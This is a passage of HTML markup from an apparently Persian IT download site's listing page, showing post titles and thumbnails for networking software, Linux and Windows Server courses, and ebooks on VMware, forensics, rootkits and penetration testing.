href="https://technet24.ir/%d8%af%d8%a7%d9%86%d9%84%d9%88%d8%af-solarwinds-engineers-toolset-13668"></a> </div> <h2 class="title"> <a href="https://technet24.ir/%d8%af%d8%a7%d9%86%d9%84%d9%88%d8%af-solarwinds-engineers-toolset-13668" class="post-title post-url"> SolarWinds Engineer&#8217;s Toolset 11.0.7 + لایسنس </a> </h2> <div class="post-meta"> <a href="https://technet24.ir/author/technet24" title="مرور مقالات نویسنده" class="post-author-a"> <i class="post-author author"> technet24 </i> </a> <span class="time"><time class="post-published updated" datetime="2019-05-13T00:00:22+00:00">اردیبهشت ۲۳, ۱۳۹۸</time></span> <span class="views post-meta-views rank-3500" data-bpv-post="13668"><i class="bf-icon bsfi-fire-4"></i>16,005</span><div class="rating rating-stars"><span style="width: 100%;"></span></div><a href="https://technet24.ir/%d8%af%d8%a7%d9%86%d9%84%d9%88%d8%af-solarwinds-engineers-toolset-13668#comments" title="دیدگاه خود را بنویسید: “SolarWinds Engineer&#8217;s Toolset 11.0.7 + لایسنس”" class="comments"><i class="fa fa-comments-o"></i> 14</a> </div> <div class="post-summary"> همگام شدن با تکنولوژی های روز دنیا یک چالش عمده در سازمان ها به حساب می آید. به ویژه با توسعه شبکه ها، پیچیده تر شدن سوئیچینگ و روتینگ موجود و استفاده از تجهیزات فیزیکی و مجازی پیشرفته این موضوع از اهمیت بیشتری برخوردار می شود. نرم افزار&hellip; <br><a class="read-more" href="https://technet24.ir/%d8%af%d8%a7%d9%86%d9%84%d9%88%d8%af-solarwinds-engineers-toolset-13668">ادامه مطلب …</a> </div> </div> </article > <article class="post-19350 type-post format-standard has-post-thumbnail listing-item listing-item-blog listing-item-blog-5 main-term-2398 bsw-8 "> <div class="item-inner clearfix"> <div class="featured clearfix"> <div class="term-badges floated"><span class="term-badge term-2398"><a href="https://technet24.ir/category/videos">Video</a></span></div> <a title="Upgrading to Red Hat Enterprise Linux (RHEL) 8 &#8211; آموزشی ارتقاء به لینوکس ردهت اینترپرایز" data-src="https://technet24.ir/wp-content/uploads/2019/05/Upgrading-to-Red-Hat-Enterprise-Linux-RHEL-8-357x210.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/technet24.ir\/wp-content\/uploads\/2019\/05\/&quot;,&quot;sizes&quot;:{&quot;210&quot;:&quot;Upgrading-to-Red-Hat-Enterprise-Linux-RHEL-8-210x136.jpg&quot;,&quot;279&quot;:&quot;Upgrading-to-Red-Hat-Enterprise-Linux-RHEL-8-279x220.jpg&quot;,&quot;357&quot;:&quot;Upgrading-to-Red-Hat-Enterprise-Linux-RHEL-8-357x210.jpg&quot;,&quot;750&quot;:&quot;Upgrading-to-Red-Hat-Enterprise-Linux-RHEL-8.jpg&quot;}}" class="img-holder" href="https://technet24.ir/upgrading-to-red-hat-enterprise-linux-rhel-8-19350"></a> </div> <h2 class="title"> <a href="https://technet24.ir/upgrading-to-red-hat-enterprise-linux-rhel-8-19350" class="post-title post-url"> Upgrading to Red Hat Enterprise Linux (RHEL) 8 &#8211; آموزشی ارتقاء به لینوکس ردهت اینترپرایز </a> </h2> <div class="post-meta"> <a href="https://technet24.ir/author/amir" title="مرور مقالات نویسنده" class="post-author-a"> <i class="post-author author"> امیر محبتی </i> </a> <span class="time"><time class="post-published updated" datetime="2019-05-12T18:32:48+00:00">اردیبهشت ۲۲, ۱۳۹۸</time></span> <span class="views post-meta-views rank-default" data-bpv-post="19350"><i class="bf-icon fa fa-eye"></i>390</span><div class="rating rating-stars"><span style="width: 90%;"></span></div><a href="https://technet24.ir/upgrading-to-red-hat-enterprise-linux-rhel-8-19350#respond" title="دیدگاه خود را بنویسید: “Upgrading to Red Hat Enterprise Linux (RHEL) 8 &#8211; آموزشی ارتقاء به لینوکس ردهت اینترپرایز”" class="comments"><i class="fa fa-comments-o"></i> 0</a> </div> <div class="post-summary"> Upgrading to Red Hat Enterprise Linux (RHEL) 8 - در این دوره آموزشی در خصوص امکانات جدید این نسخه از لینوکس که در آخرین آپدیت خود به ورژن Enterprise ارتقا یافته است مطالب زیادی را آموزش داده میشود. خصوصا در مورد ماژول های نرم افزاری و ویژگی&hellip; <br><a class="read-more" href="https://technet24.ir/upgrading-to-red-hat-enterprise-linux-rhel-8-19350">ادامه مطلب …</a> </div> </div> </article > </div> </div><div class="bs-pagination bs-ajax-pagination more_btn main-term-none clearfix"> <script>var bs_ajax_paginate_1988860945 = '{"query":{"category":"-7931","tag":"","taxonomy":"","post_ids":"","post_type":"","count":"10","order_by":"date","order":"DESC","time_filter":"","offset":"","style":"listing-blog-1","show_excerpt":"1","cats-tags-condition":"and","cats-condition":"in","tags-condition":"in","featured_image":"0","ignore_sticky_posts":"1","author_ids":"","disable_duplicate":"0","ad-active":"0","ad-after_each":"","ad-type":"","ad-banner":"none","ad-campaign":"none","ad-count":"","ad-columns":"1","ad-orderby":"date","ad-order":"ASC","ad-align":"left","paginate":"more_btn","pagination-show-label":"0","columns":"1","listing-settings":{"title-limit":"100","excerpt-limit":"240","subtitle":"0","subtitle-limit":"0","subtitle-location":"before-meta","format-icon":"1","term-badge":"1","term-badge-count":"1","term-badge-tax":"category","meta":{"show":"1","author":"1","date":"1","date-format":"standard","view":"1","share":"0","comment":"1","review":"1"},"read-more":"1"},"override-listing-settings":"1","_layout":{"state":"2\/3|1|0","page":"1-col"}},"type":"bs_post_listing","view":"Publisher_Blog_Listing_5_Shortcode","current_page":1,"ajax_url":"\/wp-admin\/admin-ajax.php","remove_duplicates":"0","columns":"1","show_excerpt":"1","paginate":"more_btn","pagination-show-label":"0","override-listing-settings":"1","listing-settings":{"title-limit":"100","excerpt-limit":"240","subtitle":"0","subtitle-limit":"0","subtitle-location":"before-meta","format-icon":"1","term-badge":"1","term-badge-count":"1","term-badge-tax":"category","meta":{"show":"1","author":"1","date":"1","date-format":"standard","view":"1","share":"0","comment":"1","review":"1"},"read-more":"1"},"ad-active":"0","ad-after_each":"","ad-type":"","ad-banner":"none","ad-campaign":"none","ad-count":"","ad-columns":"1","ad-orderby":"date","ad-order":"ASC","ad-align":"left","_layout":{"state":"2\/3|1|0","page":"1-col"},"_bs_pagin_token":"566fe44","data":{"vars":{"post-ranking-offset":6}}}';</script> <a rel="next" class="btn-bs-pagination" data-id="1988860945" title="بارگذاری مطالب بیشتر"> <span class="loading" style="display: none;"> <i class="fa fa-refresh fa-spin fa-fw"></i> </span> <span class="loading" style="display: none;"> بارگذاری ... </span> <span class="loaded txt"> بارگذاری مطالب بیشتر </span> <span class="loaded icon"> <i class="fa fa-angle-down" aria-hidden="true"></i> </span> <span class="no-more" style="display: none;"> مطلب بیشتری یافت نشد </span> </a> </div></div><div class="bscb-47304 vc_custom_1517681560266 have_bg bs-listing bs-listing-modern-grid-listing-6 bs-listing-single-tab pagination-animate"> <h3 class="section-heading sh-t2 sh-s1 main-term-2398"> <a href="https://technet24.ir/category/videos" class="main-link"> <span class="h-text main-term-2398"> <i class="bf-icon fa fa-video-camera"></i> Video </span> </a> </h3> <style> .bscb-47304.bscb-47304 .section-heading.sh-t2 .bs-pretty-tabs-container,.bscb-47304.bscb-47304 .section-heading.sh-t2 .bs-pretty-tabs-container .bs-pretty-tabs-elements,.bscb-47304.bscb-47304 .section-heading.sh-t5 .bs-pretty-tabs-container .bs-pretty-tabs-elements,.bscb-47304.bscb-47304 .section-heading.sh-t7 .bs-pretty-tabs-container .bs-pretty-tabs-elements,.bscb-47304.bscb-47304 .section-heading.sh-t7 > a > .h-text,.bscb-47304.bscb-47304 .section-heading.sh-t7 > .h-text{background-color:#ffffff} </style> <div class="bs-pagination-wrapper main-term-2398 next_prev bs-slider-first-item"> <div class="listing listing-modern-grid listing-modern-grid-6 clearfix slider-overlay-colored-anim bsw-8"> <div class="mg-col mg-col-1"> <article class="post-19407 type-post format-standard has-post-thumbnail listing-item-1 listing-item listing-mg-item listing-mg-6-item listing-mg-type-1 main-term-2398"> <div class="item-content"> <a title="SOC Analyst Training with Hands-on to SIEM from Scratch" data-src="https://technet24.ir/wp-content/uploads/2019/05/SOC-Analyst-Training-with-Hands-on-to-SIEM-from-Scratch.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/technet24.ir\/wp-content\/uploads\/2019\/05\/&quot;,&quot;sizes&quot;:{&quot;210&quot;:&quot;SOC-Analyst-Training-with-Hands-on-to-SIEM-from-Scratch-210x136.jpg&quot;,&quot;279&quot;:&quot;SOC-Analyst-Training-with-Hands-on-to-SIEM-from-Scratch-279x220.jpg&quot;,&quot;357&quot;:&quot;SOC-Analyst-Training-with-Hands-on-to-SIEM-from-Scratch-357x210.jpg&quot;,&quot;750&quot;:&quot;SOC-Analyst-Training-with-Hands-on-to-SIEM-from-Scratch.jpg&quot;}}" class="img-cont" href="https://technet24.ir/soc-analyst-training-with-hands-on-to-siem-from-scratch-19407"></a> <div class="content-container"> <h2 class="title"> <a href="https://technet24.ir/soc-analyst-training-with-hands-on-to-siem-from-scratch-19407" class="post-url post-title"> SOC Analyst Training with Hands-on to SIEM from Scratch </a> </h2> </div> </div> </article > </div> <div class="mg-col mg-col-2"> <article class="post-19382 type-post format-standard has-post-thumbnail listing-item-2 listing-item listing-mg-item listing-mg-6-item listing-mg-type-1 main-term-2398"> <div class="item-content"> <a title="Implementing Windows Server 2019 High Availability &#8211; آموزش نحوه پیاده سازی قابلیت تحمل خرابی در ویندوز سرور ۲۰۱۹" data-src="https://technet24.ir/wp-content/uploads/2019/05/Implementing-Windows-Server-2019-High-Availability.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/technet24.ir\/wp-content\/uploads\/2019\/05\/&quot;,&quot;sizes&quot;:{&quot;210&quot;:&quot;Implementing-Windows-Server-2019-High-Availability-210x136.jpg&quot;,&quot;279&quot;:&quot;Implementing-Windows-Server-2019-High-Availability-279x220.jpg&quot;,&quot;357&quot;:&quot;Implementing-Windows-Server-2019-High-Availability-357x210.jpg&quot;,&quot;750&quot;:&quot;Implementing-Windows-Server-2019-High-Availability.jpg&quot;}}" class="img-cont" href="https://technet24.ir/implementing-windows-server-2019-high-availability-%d8%a2%d9%85%d9%88%d8%b2%d8%b4-%d9%86%d8%ad%d9%88%d9%87-%d9%be%db%8c%d8%a7%d8%af%d9%87-%d8%b3%d8%a7%d8%b2%db%8c-%d9%82%d8%a7%d8%a8%d9%84%db%8c-19382"></a> <div class="content-container"> <h2 class="title"> <a href="https://technet24.ir/implementing-windows-server-2019-high-availability-%d8%a2%d9%85%d9%88%d8%b2%d8%b4-%d9%86%d8%ad%d9%88%d9%87-%d9%be%db%8c%d8%a7%d8%af%d9%87-%d8%b3%d8%a7%d8%b2%db%8c-%d9%82%d8%a7%d8%a8%d9%84%db%8c-19382" class="post-url post-title"> Implementing Windows Server 2019 High Availability &#8211; آموزش نحوه پیاده سازی قابلیت تحمل خرابی در ویندوز سرور ۲۰۱۹ </a> </h2> </div> </div> </article > </div> </div> </div><div class="bs-pagination bs-ajax-pagination next_prev main-term-2398 clearfix"> <script>var bs_ajax_paginate_1114894611 = '{"query":{"category":"2398","tag":"","taxonomy":"","post_ids":"","post_type":"","count":"2","order_by":"date","order":"DESC","time_filter":"","offset":"","style":"modern-grid-listing-6","cats-tags-condition":"and","cats-condition":"in","tags-condition":"in","featured_image":"0","ignore_sticky_posts":"1","author_ids":"","disable_duplicate":"0","ad-active":0,"paginate":"next_prev","pagination-show-label":"0","listing-settings":{"title-limit":"140","subtitle":"0","subtitle-limit":"0","subtitle-location":"before-meta","format-icon":"0","term-badge":"0","term-badge-count":"1","term-badge-tax":"category","meta":{"show":"0","author":"0","date":"0","date-format":"standard","view":"0","share":"0","comment":"0","review":"0"}},"override-listing-settings":"1","_layout":{"state":"2\/3|1|0","page":"1-col"},"overlay":"colored-anim","text-color":""},"type":"bs_post_listing","view":"Publisher_Modern_Grid_Listing_6_Shortcode","current_page":1,"ajax_url":"\/wp-admin\/admin-ajax.php","remove_duplicates":"0","query-main-term":"2398","overlay":"colored-anim","paginate":"next_prev","pagination-show-label":"0","override-listing-settings":"1","listing-settings":{"title-limit":"140","subtitle":"0","subtitle-limit":"0","subtitle-location":"before-meta","format-icon":"0","term-badge":"0","term-badge-count":"1","term-badge-tax":"category","meta":{"show":"0","author":"0","date":"0","date-format":"standard","view":"0","share":"0","comment":"0","review":"0"}},"text-color":"","ad-active":false,"_layout":{"state":"2\/3|1|0","page":"1-col"},"_bs_pagin_token":"4173bbe","data":{"vars":{"post-ranking-offset":6}}}';</script> <a class="btn-bs-pagination prev disabled" rel="prev" data-id="1114894611" title="قبلی"> <i class="fa fa-angle-right" aria-hidden="true"></i> قبلی </a> <a rel="next" class="btn-bs-pagination next" data-id="1114894611" title="بعدی"> بعدی <i class="fa fa-angle-left" aria-hidden="true"></i> </a> </div></div></div></div></div></div><div class="row vc_row wpb_row vc_row-fluid"><div class="bs-vc-wrapper"><div class="wpb_column bs-vc-column vc_column_container vc_col-sm-12"><div class="bs-vc-wrapper wpb_wrapper"><div class="bscb-15989 vc_custom_1549835271321 have_bg bs-listing bs-listing-listing-thumbnail-2 bs-listing-single-tab pagination-animate"> <h3 class="section-heading sh-t2 sh-s1 main-term-100"> <a href="https://technet24.ir/category/ebooks" class="main-link"> <span class="h-text main-term-100"> Last EBooks </span> </a> </h3> <style> .bscb-15989.bscb-15989 .section-heading.sh-t2 .bs-pretty-tabs-container,.bscb-15989.bscb-15989 .section-heading.sh-t2 .bs-pretty-tabs-container .bs-pretty-tabs-elements,.bscb-15989.bscb-15989 .section-heading.sh-t5 .bs-pretty-tabs-container .bs-pretty-tabs-elements,.bscb-15989.bscb-15989 .section-heading.sh-t7 .bs-pretty-tabs-container .bs-pretty-tabs-elements,.bscb-15989.bscb-15989 .section-heading.sh-t7 > a > .h-text,.bscb-15989.bscb-15989 .section-heading.sh-t7 > .h-text{background-color:#ffffff} </style> <div class="bs-slider-items-container" data-slider-animation-speed="750" data-slider-autoplay="1" data-slider-control-dots="style-1" data-slider-control-next-prev="off" data-autoplaySpeed="3000"> <div class="bs-pagination-wrapper main-term-100 slider bs-slider-first-item bs-slider-item bs-items-3"> <div class="listing listing-thumbnail listing-tb-2 clearfix scolumns-5 bsw-11 "> <article class="post-19418 type-post format-standard has-post-thumbnail listing-item listing-item-thumbnail listing-item-tb-2 main-term-100"> <div class="item-inner clearfix"> <div class="featured featured-type-featured-image"> <a title="CCSP Official (ISC)2 Practice Tests &#8211; کتاب تست و تمرین امنیت رایانش ابری" data-src="https://technet24.ir/wp-content/uploads/2019/05/CCSP-Official-ISC2-Practice-Tests-pdf-download-210x136.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/technet24.ir\/wp-content\/uploads\/2019\/05\/&quot;,&quot;sizes&quot;:{&quot;86&quot;:&quot;CCSP-Official-ISC2-Practice-Tests-pdf-download-86x64.jpg&quot;,&quot;210&quot;:&quot;CCSP-Official-ISC2-Practice-Tests-pdf-download-210x136.jpg&quot;,&quot;279&quot;:&quot;CCSP-Official-ISC2-Practice-Tests-pdf-download-279x220.jpg&quot;,&quot;357&quot;:&quot;CCSP-Official-ISC2-Practice-Tests-pdf-download-357x210.jpg&quot;,&quot;750&quot;:&quot;CCSP-Official-ISC2-Practice-Tests-pdf-download.jpg&quot;}}" class="img-holder" href="https://technet24.ir/ccsp-official-isc2-practice-tests-19418"></a> </div> <h2 class="title"> <a class="post-url" href="https://technet24.ir/ccsp-official-isc2-practice-tests-19418" title="CCSP Official (ISC)2 Practice Tests &#8211; کتاب تست و تمرین امنیت رایانش ابری"> <span class="post-title"> CCSP Official (ISC)2 Practice Tests &#8211; کتاب تست و تمرین&hellip; </span> </a> </h2></div> </article > <article class="post-19374 type-post format-standard has-post-thumbnail listing-item listing-item-thumbnail listing-item-tb-2 main-term-100"> <div class="item-inner clearfix"> <div class="featured featured-type-featured-image"> <a title="Mastering VMware Horizon 7.8 &#8211; Third Edition" data-src="https://technet24.ir/wp-content/uploads/2019/05/Mastering-VMware-Horizon-7.8-Third-Edition-pdf-210x136.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/technet24.ir\/wp-content\/uploads\/2019\/05\/&quot;,&quot;sizes&quot;:{&quot;86&quot;:&quot;Mastering-VMware-Horizon-7.8-Third-Edition-pdf-86x64.jpg&quot;,&quot;210&quot;:&quot;Mastering-VMware-Horizon-7.8-Third-Edition-pdf-210x136.jpg&quot;,&quot;279&quot;:&quot;Mastering-VMware-Horizon-7.8-Third-Edition-pdf-279x220.jpg&quot;,&quot;357&quot;:&quot;Mastering-VMware-Horizon-7.8-Third-Edition-pdf-357x210.jpg&quot;,&quot;750&quot;:&quot;Mastering-VMware-Horizon-7.8-Third-Edition-pdf.jpg&quot;}}" class="img-holder" href="https://technet24.ir/mastering-vmware-horizon-7-8-third-edition-19374"></a> </div> <h2 class="title"> <a class="post-url" href="https://technet24.ir/mastering-vmware-horizon-7-8-third-edition-19374" title="Mastering VMware Horizon 7.8 &#8211; Third Edition"> <span class="post-title"> Mastering VMware Horizon 7.8 &#8211; Third Edition </span> </a> </h2></div> </article > <article class="post-19315 type-post format-standard has-post-thumbnail listing-item listing-item-thumbnail listing-item-tb-2 main-term-100"> <div class="item-inner clearfix"> <div class="featured featured-type-featured-image"> <a title="Mastering Windows Server 2019 &#8211; Second Edition &#8211; آموزش جامع ویندوز سرور ۲۰۱۹" data-src="https://technet24.ir/wp-content/uploads/2019/05/Mastering-Windows-Server-2019-Second-Edition-Pdf-210x136.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/technet24.ir\/wp-content\/uploads\/2019\/05\/&quot;,&quot;sizes&quot;:{&quot;86&quot;:&quot;Mastering-Windows-Server-2019-Second-Edition-Pdf-86x64.jpg&quot;,&quot;210&quot;:&quot;Mastering-Windows-Server-2019-Second-Edition-Pdf-210x136.jpg&quot;,&quot;279&quot;:&quot;Mastering-Windows-Server-2019-Second-Edition-Pdf-279x220.jpg&quot;,&quot;357&quot;:&quot;Mastering-Windows-Server-2019-Second-Edition-Pdf-357x210.jpg&quot;,&quot;750&quot;:&quot;Mastering-Windows-Server-2019-Second-Edition-Pdf.jpg&quot;}}" class="img-holder" href="https://technet24.ir/mastering-windows-server-2019-second-edition-19315"></a> </div> <h2 class="title"> <a class="post-url" href="https://technet24.ir/mastering-windows-server-2019-second-edition-19315" title="Mastering Windows Server 2019 &#8211; Second Edition &#8211; آموزش جامع ویندوز سرور ۲۰۱۹"> <span class="post-title"> Mastering Windows Server 2019 &#8211; Second Edition &#8211;&hellip; </span> </a> </h2></div> </article > <article class="post-19276 type-post format-standard has-post-thumbnail listing-item listing-item-thumbnail listing-item-tb-2 main-term-100"> <div class="item-inner clearfix"> <div class="featured featured-type-featured-image"> <a title="VMware vSphere 6.7 Data Center Design Cookbook &#8211; Third Edition" data-src="https://technet24.ir/wp-content/uploads/2019/05/VMware-vSphere-6.7-Data-Center-Design-Cookbook-Third-Edition-pdf-210x136.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/technet24.ir\/wp-content\/uploads\/2019\/05\/&quot;,&quot;sizes&quot;:{&quot;86&quot;:&quot;VMware-vSphere-6.7-Data-Center-Design-Cookbook-Third-Edition-pdf-86x64.jpg&quot;,&quot;210&quot;:&quot;VMware-vSphere-6.7-Data-Center-Design-Cookbook-Third-Edition-pdf-210x136.jpg&quot;,&quot;279&quot;:&quot;VMware-vSphere-6.7-Data-Center-Design-Cookbook-Third-Edition-pdf-279x220.jpg&quot;,&quot;357&quot;:&quot;VMware-vSphere-6.7-Data-Center-Design-Cookbook-Third-Edition-pdf-357x210.jpg&quot;,&quot;750&quot;:&quot;VMware-vSphere-6.7-Data-Center-Design-Cookbook-Third-Edition-pdf.jpg&quot;}}" class="img-holder" href="https://technet24.ir/vmware-vsphere-6-7-data-center-design-cookbook-third-edition-pdf-19276"></a> </div> <h2 class="title"> <a class="post-url" href="https://technet24.ir/vmware-vsphere-6-7-data-center-design-cookbook-third-edition-pdf-19276" title="VMware vSphere 6.7 Data Center Design Cookbook &#8211; Third Edition"> <span class="post-title"> VMware vSphere 6.7 Data Center Design Cookbook &#8211; Third&hellip; </span> </a> </h2></div> </article > <article class="post-19280 type-post format-standard has-post-thumbnail listing-item listing-item-thumbnail listing-item-tb-2 main-term-100"> <div class="item-inner clearfix"> <div class="featured featured-type-featured-image"> <a title="Securing Network Infrastructure &#8211; زیربنای امنیت شبکه" data-src="https://technet24.ir/wp-content/uploads/2019/05/Securing-Network-Infrastructure-pdf-download-210x136.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/technet24.ir\/wp-content\/uploads\/2019\/05\/&quot;,&quot;sizes&quot;:{&quot;86&quot;:&quot;Securing-Network-Infrastructure-pdf-download-86x64.jpg&quot;,&quot;210&quot;:&quot;Securing-Network-Infrastructure-pdf-download-210x136.jpg&quot;,&quot;279&quot;:&quot;Securing-Network-Infrastructure-pdf-download-279x220.jpg&quot;,&quot;357&quot;:&quot;Securing-Network-Infrastructure-pdf-download-357x210.jpg&quot;,&quot;750&quot;:&quot;Securing-Network-Infrastructure-pdf-download.jpg&quot;}}" class="img-holder" href="https://technet24.ir/securing-network-infrastructure-pdf-19280"></a> </div> <h2 class="title"> <a class="post-url" href="https://technet24.ir/securing-network-infrastructure-pdf-19280" title="Securing Network Infrastructure &#8211; زیربنای امنیت شبکه"> <span class="post-title"> Securing Network Infrastructure &#8211; زیربنای امنیت شبکه </span> </a> </h2></div> </article > </div> </div> <div class="bs-pagination-wrapper main-term-100 slider bs-slider-item bs-items-3"> <div class="listing listing-thumbnail listing-tb-2 clearfix scolumns-5 bsw-11 "> <article class="post-19053 type-post format-standard has-post-thumbnail listing-item listing-item-thumbnail listing-item-tb-2 main-term-100"> <div class="item-inner clearfix"> <div class="featured featured-type-featured-image"> <a title="Hands-On Network Forensics &#8211; کتاب آموزش نحوه بررسی جرایم شبکه (فارنزیک شبکه)" data-src="https://technet24.ir/wp-content/uploads/2019/05/Hands-On-Network-Forensics-pdf-210x136.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/technet24.ir\/wp-content\/uploads\/2019\/05\/&quot;,&quot;sizes&quot;:{&quot;86&quot;:&quot;Hands-On-Network-Forensics-pdf-86x64.jpg&quot;,&quot;210&quot;:&quot;Hands-On-Network-Forensics-pdf-210x136.jpg&quot;,&quot;279&quot;:&quot;Hands-On-Network-Forensics-pdf-279x220.jpg&quot;,&quot;357&quot;:&quot;Hands-On-Network-Forensics-pdf-357x210.jpg&quot;,&quot;750&quot;:&quot;Hands-On-Network-Forensics-pdf.jpg&quot;}}" class="img-holder" href="https://technet24.ir/hands-on-network-forensics-19053"></a> </div> <h2 class="title"> <a class="post-url" href="https://technet24.ir/hands-on-network-forensics-19053" title="Hands-On Network Forensics &#8211; کتاب آموزش نحوه بررسی جرایم شبکه (فارنزیک شبکه)"> <span class="post-title"> Hands-On Network Forensics &#8211; کتاب آموزش نحوه بررسی&hellip; </span> </a> </h2></div> </article > <article class="post-18882 type-post format-standard has-post-thumbnail listing-item listing-item-thumbnail listing-item-tb-2 main-term-100"> <div class="item-inner clearfix"> <div class="featured featured-type-featured-image"> <a title="Rootkits and Bootkits: Reversing Modern Malware and Next Generation Threats" data-src="https://technet24.ir/wp-content/uploads/2019/04/Rootkits-and-Bootkits-pdf-Download-210x136.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/technet24.ir\/wp-content\/uploads\/2019\/04\/&quot;,&quot;sizes&quot;:{&quot;86&quot;:&quot;Rootkits-and-Bootkits-pdf-Download-86x64.jpg&quot;,&quot;210&quot;:&quot;Rootkits-and-Bootkits-pdf-Download-210x136.jpg&quot;,&quot;279&quot;:&quot;Rootkits-and-Bootkits-pdf-Download-279x220.jpg&quot;,&quot;357&quot;:&quot;Rootkits-and-Bootkits-pdf-Download-357x210.jpg&quot;,&quot;750&quot;:&quot;Rootkits-and-Bootkits-pdf-Download.jpg&quot;}}" class="img-holder" href="https://technet24.ir/rootkits-and-bootkits-pdf-18882"></a> </div> <h2 class="title"> <a class="post-url" href="https://technet24.ir/rootkits-and-bootkits-pdf-18882" title="Rootkits and Bootkits: Reversing Modern Malware and Next Generation Threats"> <span class="post-title"> Rootkits and Bootkits: Reversing Modern Malware and Next&hellip; </span> </a> </h2></div> </article > <article class="post-18876 type-post format-standard has-post-thumbnail listing-item listing-item-thumbnail listing-item-tb-2 main-term-100"> <div class="item-inner clearfix"> <div class="featured featured-type-featured-image"> <a title="CompTIA A+ Complete Study Guide: Exam Core 1 220-1001 and Exam Core 2 220-1002, 4th Edition" data-src="https://technet24.ir/wp-content/uploads/2019/04/CompTIA-A-Complete-Study-Guide-Exam-Core-1-220-1001-and-Exam-Core-2-220-1002-4th-Edition-pdf-210x136.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/technet24.ir\/wp-content\/uploads\/2019\/04\/&quot;,&quot;sizes&quot;:{&quot;86&quot;:&quot;CompTIA-A-Complete-Study-Guide-Exam-Core-1-220-1001-and-Exam-Core-2-220-1002-4th-Edition-pdf-86x64.jpg&quot;,&quot;210&quot;:&quot;CompTIA-A-Complete-Study-Guide-Exam-Core-1-220-1001-and-Exam-Core-2-220-1002-4th-Edition-pdf-210x136.jpg&quot;,&quot;279&quot;:&quot;CompTIA-A-Complete-Study-Guide-Exam-Core-1-220-1001-and-Exam-Core-2-220-1002-4th-Edition-pdf-279x220.jpg&quot;,&quot;357&quot;:&quot;CompTIA-A-Complete-Study-Guide-Exam-Core-1-220-1001-and-Exam-Core-2-220-1002-4th-Edition-pdf-357x210.jpg&quot;,&quot;750&quot;:&quot;CompTIA-A-Complete-Study-Guide-Exam-Core-1-220-1001-and-Exam-Core-2-220-1002-4th-Edition-pdf.jpg&quot;}}" class="img-holder" href="https://technet24.ir/comptia-a-complete-study-guide-exam-core-1-220-1001-and-exam-core-2-220-1002-4th-edition-18876"></a> </div> <h2 class="title"> <a class="post-url" href="https://technet24.ir/comptia-a-complete-study-guide-exam-core-1-220-1001-and-exam-core-2-220-1002-4th-edition-18876" title="CompTIA A+ Complete Study Guide: Exam Core 1 220-1001 and Exam Core 2 220-1002, 4th Edition"> <span class="post-title"> CompTIA A+ Complete Study Guide: Exam Core 1 220-1001 and&hellip; </span> </a> </h2></div> </article > <article class="post-18838 type-post format-standard has-post-thumbnail listing-item listing-item-thumbnail listing-item-tb-2 main-term-100"> <div class="item-inner clearfix"> <div class="featured featured-type-featured-image"> <a title="Hacker’s Manual 2019" data-src="https://technet24.ir/wp-content/uploads/2019/04/Hackers-Manual-2019-pdf-download-210x136.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/technet24.ir\/wp-content\/uploads\/2019\/04\/&quot;,&quot;sizes&quot;:{&quot;86&quot;:&quot;Hackers-Manual-2019-pdf-download-86x64.jpg&quot;,&quot;210&quot;:&quot;Hackers-Manual-2019-pdf-download-210x136.jpg&quot;,&quot;279&quot;:&quot;Hackers-Manual-2019-pdf-download-279x220.jpg&quot;,&quot;357&quot;:&quot;Hackers-Manual-2019-pdf-download-357x210.jpg&quot;,&quot;750&quot;:&quot;Hackers-Manual-2019-pdf-download.jpg&quot;}}" class="img-holder" href="https://technet24.ir/hackers-manual-2019-18838"></a> </div> <h2 class="title"> <a class="post-url" href="https://technet24.ir/hackers-manual-2019-18838" title="Hacker’s Manual 2019"> <span class="post-title"> Hacker’s Manual 2019 </span> </a> </h2></div> </article > <article class="post-18824 type-post format-standard has-post-thumbnail listing-item listing-item-thumbnail listing-item-tb-2 main-term-100"> <div class="item-inner clearfix"> <div class="featured featured-type-featured-image"> <a title="Python Penetration Testing Essentials &#8211; Second Edition &#8211; آموزش تست نفوذ پایتون" data-src="https://technet24.ir/wp-content/uploads/2019/04/Python-Penetration-Testing-Essentials-Second-Edition-pdf-download-210x136.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/technet24.ir\/wp-content\/uploads\/2019\/04\/&quot;,&quot;sizes&quot;:{&quot;86&quot;:&quot;Python-Penetration-Testing-Essentials-Second-Edition-pdf-download-86x64.jpg&quot;,&quot;210&quot;:&quot;Python-Penetration-Testing-Essentials-Second-Edition-pdf-download-210x136.jpg&quot;,&quot;279&quot;:&quot;Python-Penetration-Testing-Essentials-Second-Edition-pdf-download-279x220.jpg&quot;,&quot;357&quot;:&quot;Python-Penetration-Testing-Essentials-Second-Edition-pdf-download-357x210.jpg&quot;,&quot;750&quot;:&quot;Python-Penetration-Testing-Essentials-Second-Edition-pdf-download.jpg&quot;}}" class="img-holder" href="https://technet24.ir/python-penetration-testing-essentials-second-edition-%d8%a2%d9%85%d9%88%d8%b2%d8%b4-%d8%aa%d8%b3%d8%aa-%d9%86%d9%81%d9%88%d8%b0-%d9%be%d8%a7%db%8c%d8%aa%d9%88%d9%86-18824"></a> </div> <h2 class="title"> <a class="post-url" href="https://technet24.ir/python-penetration-testing-essentials-second-edition-%d8%a2%d9%85%d9%88%d8%b2%d8%b4-%d8%aa%d8%b3%d8%aa-%d9%86%d9%81%d9%88%d8%b0-%d9%be%d8%a7%db%8c%d8%aa%d9%88%d9%86-18824" title="Python Penetration Testing Essentials &#8211; Second Edition &#8211; آموزش تست نفوذ پایتون"> <span class="post-title"> Python Penetration Testing Essentials &#8211; Second Edition&hellip; </span> </a> </h2></div> </article > </div> </div> <div class="bs-pagination-wrapper main-term-100 slider bs-slider-item bs-items-3"> <div class="listing listing-thumbnail listing-tb-2 clearfix scolumns-5 bsw-11 "> <article class="post-18813 type-post format-standard has-post-thumbnail listing-item listing-item-thumbnail listing-item-tb-2 main-term-100"> <div class="item-inner clearfix"> <div 